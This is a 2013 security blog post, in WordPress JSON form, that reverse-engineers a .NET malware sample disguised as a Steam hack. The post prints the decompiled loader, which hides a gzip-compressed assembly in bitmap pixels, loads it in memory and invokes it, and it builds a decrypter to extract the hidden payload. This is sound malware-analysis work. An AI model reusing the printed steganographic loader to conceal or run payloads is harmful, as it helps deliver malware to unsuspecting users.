{"id":544,"date":"2013-10-07T09:51:36","date_gmt":"2013-10-07T09:51:36","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=544"},"modified":"2013-10-07T09:51:36","modified_gmt":"2013-10-07T09:51:36","slug":"stego-malware-and-dotnet","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2013\/10\/stego-malware-and-dotnet\/","title":{"rendered":"Stego Malware And DotNet"},"content":{"rendered":"

Greetings and salutations.<\/p>\n

Today I’m going to be going over some malware I found in the wild. I found it after doing a search for ‘hack’ on the ‘rapidshare’ section of 4chan. With the name ‘SteamHackCount.exe’, being about 350 kb, and having the Apple icon? Totally legit right???
\n\"seemslegit\"<\/a>
\nOpening the program in IDA showed the program was a .net binary.
\n\"ida001\"<\/a>
\nWhile I love IDA to death, I don’t care for its MSIL decompilation. There are several better .NET decompilers out there to choose from such as ILspy, GreyWolf, DotPeek, Redgate Reflector, and DILE. In this particular case, I am going to load the thing into ILspy.<\/p>\n

Peering inside, the binary appears to be obfuscated – common for .net malware.
\n\"ilspy2\"<\/a>
\nThe entire app doesn’t seem all that complicated. It’s a windows app that starts hidden – typical. On window start, the function ‘rHOQZwrVXEKdlaGCCBGqxFV()’ is called. Let’s look closer at the function ‘rHOQZwrVXEKdlaGCCBGqxFV’<\/p>\n

<\/p>\n

\n
public<\/span> void<\/span> rHOQZwrVXEKdlaGCCBGqxFV<\/span>()\r\n{\r\n\tResourceManager resourceManager = new<\/span> ResourceManager("NRwifYtqHh"<\/span>, Assembly.GetExecutingAssembly());\r\n\tBitmap nvTDNTPbrHOQZwrVXEKdlaGCC = (Bitmap)resourceManager.GetObject("V3Mi6UNB"<\/span>);\r\n\tResourceManager resourceManager2 = new<\/span> ResourceManager("BIDRVmCEPb"<\/span>, Assembly.GetExecutingAssembly());\r\n\tBitmap nvTDNTPbrHOQZwrVXEKdlaGCC2 = (Bitmap)resourceManager2.GetObject("mwxv1jbj"<\/span>);\r\n\tbyte<\/span>[] array = this<\/span>.OqvJGoCbbDMYzUyXpPpBu(nvTDNTPbrHOQZwrVXEKdlaGCC);\r\n\tbyte<\/span>[] rawAssembly = this<\/span>.OqvJGoCbbDMYzUyXpPpBu(nvTDNTPbrHOQZwrVXEKdlaGCC2);\r\n\tAssembly assembly = Assembly.Load(rawAssembly);\r\n\tobject<\/span> objectValue = RuntimeHelpers.GetObjectValue(assembly.CreateInstance(this<\/span>.KdlaGCCBGqxFVvuLBEvUxcaIw("47|123|158|144|147|148|161|93|127|164|145|155|152|146|114|155|144|162|162|"<\/span>)));\r\n\tobjectValue.GetType().InvokeMember(this<\/span>.KdlaGCCBGqxFVvuLBEvUxcaIw("75|157|192|185|148|191|"<\/span>), BindingFlags.InvokeMethod, null<\/span>, RuntimeHelpers.GetObjectValue(objectValue), new<\/span> object<\/span>[]\r\n\t{\r\n\t\tarray,\r\n\t\tfalse<\/span>,\r\n\t\t"Nothing"<\/span>,\r\n\t\t"Nothing"<\/span>\r\n\t});\r\n}\r\n<\/pre>\n<\/div>\n
This function appears to be invoking the ResourceManager object which effectively loads a resource file compiled within the binary. Resources are usually cursors, bitmaps, icons and the like. <\/p>\n
<\/p>\n
\n
ResourceManager resourceManager = new<\/span> ResourceManager("NRwifYtqHh"<\/span>, Assembly.GetExecutingAssembly());\r\n\t\tBitmap nvTDNTPbrHOQZwrVXEKdlaGCC = (Bitmap)resourceManager.GetObject("V3Mi6UNB"<\/span>);\r\n<\/pre>\n<\/div>\n
In this case, the function is loading from the local resource (shown on the top left in ILspy) a bitmap file for use. Further down, we see that the function is passing these same bitmap images to another function ‘OqvJGoCbbDMYzUyXpPpBu’.<\/p>\n
<\/p>\n
\n
public<\/span> byte<\/span>[] OqvJGoCbbDMYzUyXpPpBu<\/span>(Bitmap NvTDNTPbrHOQZwrVXEKdlaGCC)\r\n{\r\n\tList<byte<\/span>> list = new<\/span> List<byte<\/span>>();\r\n\tint<\/span> arg_11_0 = 0<\/span>;\r\n\tchecked<\/span>\r\n\t{\r\n\t\tint<\/span> num = NvTDNTPbrHOQZwrVXEKdlaGCC.Width - 1<\/span>;\r\n\t\tfor<\/span> (int<\/span> i = arg_11_0; i <= num; i++)\r\n\t\t{\r\n\t\t\tint<\/span> arg_1F_0 = 0<\/span>;\r\n\t\t\tint<\/span> num2 = NvTDNTPbrHOQZwrVXEKdlaGCC.Height - 1<\/span>;\r\n\t\t\tfor<\/span> (int<\/span> j = arg_1F_0; j <= num2; j++)\r\n\t\t\t{\r\n\t\t\t\tColor pixel = NvTDNTPbrHOQZwrVXEKdlaGCC.GetPixel(i, j);\r\n\t\t\t\tif<\/span> (pixel != Color.FromArgb(0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>))\r\n\t\t\t\t{\r\n\t\t\t\t\tlist.Add(pixel.R);\r\n\t\t\t\t\tlist.Add(pixel.G);\r\n\t\t\t\t\tlist.Add(pixel.B);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn<\/span> this<\/span>.FTBSEIiWUOfdzVtzvILZv(list.ToArray());\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
Inside this convoluted mess we see the bitmap file is being iterated through, and converted to a byte array. The function returns its result to another function ‘FTBSEIiWUOfdzVtzvILZv’.<\/p>\n
This function further processes the byte array of the former bitmap image by performing some gzip decompression.  <\/p>\n
<\/p>\n
\n
public<\/span> byte<\/span>[] FTBSEIiWUOfdzVtzvILZv<\/span>(byte<\/span>[] wGQLoEWqKEtZijhmXQXCPOehkcCQ)\r\n{\r\n\tchecked<\/span>\r\n\t{\r\n\t\tusing<\/span> (MemoryStream memoryStream = new<\/span> MemoryStream(wGQLoEWqKEtZijhmXQXCPOehkcCQ))\r\n\t\t{\r\n\t\t\tusing<\/span> (GZipStream gZipStream = new<\/span> GZipStream(memoryStream, CompressionMode.Decompress))\r\n\t\t\t{\r\n\t\t\t\tint<\/span> num = 0<\/span>;\r\n\t\t\t\tint<\/span> num2;\r\n\t\t\t\tdo<\/span>\r\n\t\t\t\t{\r\n\t\t\t\t\twGQLoEWqKEtZijhmXQXCPOehkcCQ = (byte<\/span>[])Utils.CopyArray((Array)wGQLoEWqKEtZijhmXQXCPOehkcCQ, new<\/span> byte<\/span>[num + 1024<\/span> - 1<\/span> + 1<\/span>]);\r\n\t\t\t\t\tnum2 = gZipStream.Read(wGQLoEWqKEtZijhmXQXCPOehkcCQ, num, 1024<\/span>);\r\n\t\t\t\t\tnum += num2;\r\n\t\t\t\t}\r\n\t\t\t\twhile<\/span> (num2 >= 1024<\/span>);\r\n\t\t\t\twGQLoEWqKEtZijhmXQXCPOehkcCQ = (byte<\/span>[])Utils.CopyArray((Array)wGQLoEWqKEtZijhmXQXCPOehkcCQ, new<\/span> byte<\/span>[num - 1<\/span> + 1<\/span>]);\r\n\t\t\t\tgZipStream.Close();\r\n\t\t\t}\r\n\t\t\tmemoryStream.Close();\r\n\t\t}\r\n\t\treturn<\/span> wGQLoEWqKEtZijhmXQXCPOehkcCQ;\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
After decompressing the byte array, the program then loads the file as an assembly with  ‘Assembly assembly = Assembly.Load(rawAssembly);’.
\nThe last few lines of code are responsible for initializing the methods of choice within the loaded assembly. Think of an assembly as just another word for program.
\n<\/p>\n
\n
object<\/span> objectValue = RuntimeHelpers.GetObjectValue(assembly.CreateInstance(this<\/span>.KdlaGCCBGqxFVvuLBEvUxcaIw("47|123|158|144|147|148|161|93|127|164|145|155|152|146|114|155|144|162|162|"<\/span>)));\r\n\tobjectValue.GetType().InvokeMember(this<\/span>.KdlaGCCBGqxFVvuLBEvUxcaIw("75|157|192|185|148|191|"<\/span>), BindingFlags.InvokeMethod, null<\/span>, RuntimeHelpers.GetObjectValue(objectValue), new<\/span> object<\/span>[]\r\n\t{\r\n\t\tarray,\r\n\t\tfalse<\/span>,\r\n\t\t"Nothing"<\/span>,\r\n\t\t"Nothing"<\/span>\r\n\t});\r\n<\/pre>\n<\/div>\n
This brings us to our last obfuscated function – ‘KdlaGCCBGqxFVvuLBEvUxcaIw’. Let’s have a look see:
\n<\/p>\n
\n
public<\/span> string<\/span> KdlaGCCBGqxFVvuLBEvUxcaIw<\/span>(string<\/span> RIxMWFFrsTcoRkPnGSGDw)\r\n{\r\n\tstring<\/span> text = null<\/span>;\r\n\tstring<\/span>[] array = RIxMWFFrsTcoRkPnGSGDw.Split(new<\/span> char<\/span>[]\r\n\t{\r\n\t\t'|'<\/span>\r\n\t});\r\n\tstring<\/span>[] array2 = array;\r\n\tchecked<\/span>\r\n\t{\r\n\t\tfor<\/span> (int<\/span> i = 0<\/span>; i < array2.Length; i++)\r\n\t\t{\r\n\t\t\tstring<\/span> value<\/span> = array2[i];\r\n\t\t\ttry<\/span>\r\n\t\t\t{\r\n\t\t\t\ttext += Conversions.ToString(Strings.Chr((int<\/span>)Math.Round(unchecked<\/span>(Conversions.ToDouble(value<\/span>) - Conversions.ToDouble(array[0<\/span>])))));\r\n\t\t\t}\r\n\t\t\tcatch<\/span> (Exception arg_4F_0)\r\n\t\t\t{\r\n\t\t\t\tProjectData.SetProjectError(arg_4F_0);\r\n\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn<\/span> text.Remove(0<\/span>, 1<\/span>);\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
The function takes a pipe delimited string of numbers and returns a string. If you’re curious what the 2 pipe delimited strings say from this.KdlaGCCBGqxFVvuLBEvUxcaIw(“47|123|158|144|147|148|161|93|127|164|145|155|152|146|114|155|144|162|162|”) and this.KdlaGCCBGqxFVvuLBEvUxcaIw(“75|157|192|185|148|191|”), they decode to ‘RunIt’, and ‘Loader.PublicClass’.
\nLastly the function takes invokes the member of the decoded method.<\/p>\n
That’s a lot to take in and I hope you’re still with me. What we’re going to do now is write a little decryption application using the code from ILspy. I saved the 2 resource files directly and drahg \/ drop imported them into visual studio. I have changed the function names slightly for easier readability:
\n<\/p>\n
\n
using<\/span> System<\/span>;\r\nusing<\/span> System.Collections.Generic<\/span>;\r\nusing<\/span> System.Linq<\/span>;\r\nusing<\/span> System.Text<\/span>;\r\nusing<\/span> System.Resources<\/span>;\r\nusing<\/span> Microsoft.VisualBasic.CompilerServices<\/span>;\r\nusing<\/span> System.Drawing<\/span>;\r\nusing<\/span> System.IO<\/span>;\r\nusing<\/span> System.IO.Compression<\/span>;\r\nusing<\/span> System.Reflection<\/span>;\r\nusing<\/span> System.Runtime.CompilerServices<\/span>;\r\n\r\n\r\nnamespace<\/span> Decrypt_me<\/span>\r\n{\r\n    class<\/span> Program<\/span>\r\n    {\r\n        static<\/span> void<\/span> Main<\/span>(string<\/span>[] args)\r\n        {\r\n            Decrypt_me.Program p = new<\/span> Program();\r\n            p.maininit();\r\n            Console.ReadKey();\r\n        }\r\n        public<\/span> static<\/span> string<\/span> decr<\/span>(string<\/span> whatever)\r\n        {\r\n            string<\/span> text = null<\/span>;\r\n            string<\/span>[] array = whatever.Split(new<\/span> char<\/span>[]\r\n\t{\r\n\t\t'|'<\/span>\r\n\t});\r\n            string<\/span>[] array2 = array;\r\n            checked<\/span>\r\n            {\r\n                for<\/span> (int<\/span> i = 0<\/span>; i < array2.Length; i++)\r\n                {\r\n                    string<\/span> value<\/span> = array2[i];\r\n                    try<\/span>\r\n                    {\r\n                        text += Conversions.ToString(Microsoft.VisualBasic.Strings.Chr((int<\/span>)Math.Round(unchecked<\/span>(Conversions.ToDouble(value<\/span>) - Conversions.ToDouble(array[0<\/span>])))));\r\n                    }\r\n                    catch<\/span> (Exception arg_4F_0)\r\n                    {\r\n                        ProjectData.SetProjectError(arg_4F_0);\r\n                        ProjectData.ClearProjectError();\r\n                    }\r\n                }\r\n                return<\/span> text.Remove(0<\/span>, 1<\/span>);\r\n            }\r\n        }\r\n        public<\/span> static<\/span> byte<\/span>[] haha<\/span>(Bitmap timetodie)\r\n        {\r\n            List<byte<\/span>> list = new<\/span> List<byte<\/span>>();\r\n            int<\/span> arg_11_0 = 0<\/span>;\r\n            checked<\/span>\r\n            {\r\n                int<\/span> num = timetodie.Width - 1<\/span>;\r\n                for<\/span> (int<\/span> i = arg_11_0; i <= num; i++)\r\n                {\r\n                    int<\/span> arg_1F_0 = 0<\/span>;\r\n                    int<\/span> num2 = timetodie.Height - 1<\/span>;\r\n                    for<\/span> (int<\/span> j = arg_1F_0; j <= num2; j++)\r\n                    {\r\n                        Color pixel = timetodie.GetPixel(i, j);\r\n                        if<\/span> (pixel != Color.FromArgb(0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>))\r\n                        {\r\n                            list.Add(pixel.R);\r\n                            list.Add(pixel.G);\r\n                            list.Add(pixel.B);\r\n                        }\r\n                    }\r\n                }\r\n                return<\/span> decr1<\/span>(list.ToArray());\r\n            }\r\n        }\r\n        public<\/span> static<\/span> byte<\/span>[] decr1<\/span>(byte<\/span>[] maybe)\r\n        {\r\n            checked<\/span>\r\n            {\r\n                using<\/span> (MemoryStream memoryStream = new<\/span> MemoryStream(maybe))\r\n                {\r\n                    using<\/span> (GZipStream gZipStream = new<\/span> GZipStream(memoryStream, CompressionMode.Decompress))\r\n                    {\r\n                        int<\/span> num = 0<\/span>;\r\n                        int<\/span> num2;\r\n                        do<\/span>\r\n                        {\r\n                            maybe = (byte<\/span>[])Utils.CopyArray((Array)maybe, new<\/span> byte<\/span>[num + 1024<\/span> - 1<\/span> + 1<\/span>]);\r\n                            num2 = gZipStream.Read(maybe, num, 1024<\/span>);\r\n                            num += num2;\r\n                        }\r\n                        while<\/span> (num2 >= 1024<\/span>);\r\n                        maybe = (byte<\/span>[])Utils.CopyArray((Array)maybe, new<\/span> byte<\/span>[num - 1<\/span> + 1<\/span>]);\r\n                        gZipStream.Close();\r\n                    }\r\n                    memoryStream.Close();\r\n                }\r\n                return<\/span> maybe;\r\n            }\r\n        }\r\n        public<\/span> void<\/span> maininit<\/span>()\r\n        {\r\n            ResourceManager resourceManager = new<\/span> ResourceManager("Decrypt_me.NRwifYtqHh"<\/span>, Assembly.GetExecutingAssembly());\r\n            Bitmap timetodie = (Bitmap)resourceManager.GetObject("V3Mi6UNB"<\/span>);\r\n            ResourceManager resourceManager2 = new<\/span> ResourceManager("Decrypt_me.BIDRVmCEPb"<\/span>, Assembly.GetExecutingAssembly());\r\n            Bitmap timetodie2 = (Bitmap)resourceManager2.GetObject("mwxv1jbj"<\/span>);\r\n            byte<\/span>[] array = haha(timetodie);\r\n            byte<\/span>[] rawAssembly = haha(timetodie2);\r\n            Assembly assembly = Assembly.Load(rawAssembly);\r\n            \r\n           \/\/ object objectValue = RuntimeHelpers.GetObjectValue(assembly.CreateInstance(decr("47|123|158|144|147|148|161|93|127|164|145|155|152|146|114|155|144|162|162|")));<\/span>\r\n           \r\n            Console.WriteLine("First member name: "<\/span> + decr("75|157|192|185|148|191|"<\/span>));\r\n            Console.WriteLine("Second member name: "<\/span> + decr("47|123|158|144|147|148|161|93|127|164|145|155|152|146|114|155|144|162|162|"<\/span>));\r\n            File.WriteAllBytes("assemblylisting1.exe"<\/span>, array);\r\n            File.WriteAllBytes("assemblylisting2.exe"<\/span>, rawAssembly);\r\n            Console.WriteLine("Wrote both assemblies."<\/span>);\r\n\r\n            \/*objectValue.GetType().InvokeMember(decr("75|157|192|185|148|191|"), BindingFlags.InvokeMethod, null, RuntimeHelpers.GetObjectValue(objectValue), new object[]<\/span>\r\n\t{<\/span>\r\n\t\tarray,<\/span>\r\n\t\tfalse,<\/span>\r\n\t\t"Nothing",<\/span>\r\n\t\t"Nothing"<\/span>\r\n\t});*\/<\/span>\r\n        }\r\n\r\n    }\r\n\r\n}\r\n<\/pre>\n<\/div>\n
When I ran the code, it wrote the decrypted bytes of the assembly files to ‘assemblylisting1.exe’ and ‘assemblylisting2.exe’ in the current directory.
\n\"decrypted\"<\/a><\/p>\n
Loading one of the decrypted assembly files into ILspy shows us the true nature of the program. Here we see the 2 decoded strings from the original program – ‘RunIt’ and ‘PublicClass’:
\n\"ilspy3\"<\/a>
\nThe code is pretty straight forward – inject the program into ‘svchost’ and place the program in the startup registry key.
\nThe actual code behind the ‘inject’ function is pretty interesting<\/a>, but perhaps we’ll go over it another time.  If you’re curious about it, download ILspy and take a peek yourself. You can download both the malware and my decrypter source code here<\/a>. The password is ‘lolwut’.<\/p>\n
The there was another binary present that I did not go over – the first assembly listing. This assembly listing is encrypted \/ encoded with PElock’s ‘.netshrink’ which I’ll have to go over in detail in a full blog post as there is a lot to cover. Since the file isn’t directly launched, I omitted its presence in this writeup. <\/p>\n","protected":false},"excerpt":{"rendered":"
Greetings and salutations. Today I’m going to be going over some malware I found in the wild. I found it after doing a search for ‘hack’ on the ‘rapidshare’ section of 4chan. With the name ‘SteamHackCount.exe’, being about 350 kb, and having the Apple icon? Totally legit right??? Opening the program in IDA showed the […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,7],"tags":[38,48,70],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/544"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":4,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"predecessor-version":[{"id":555,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/544\/revisions\/555"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}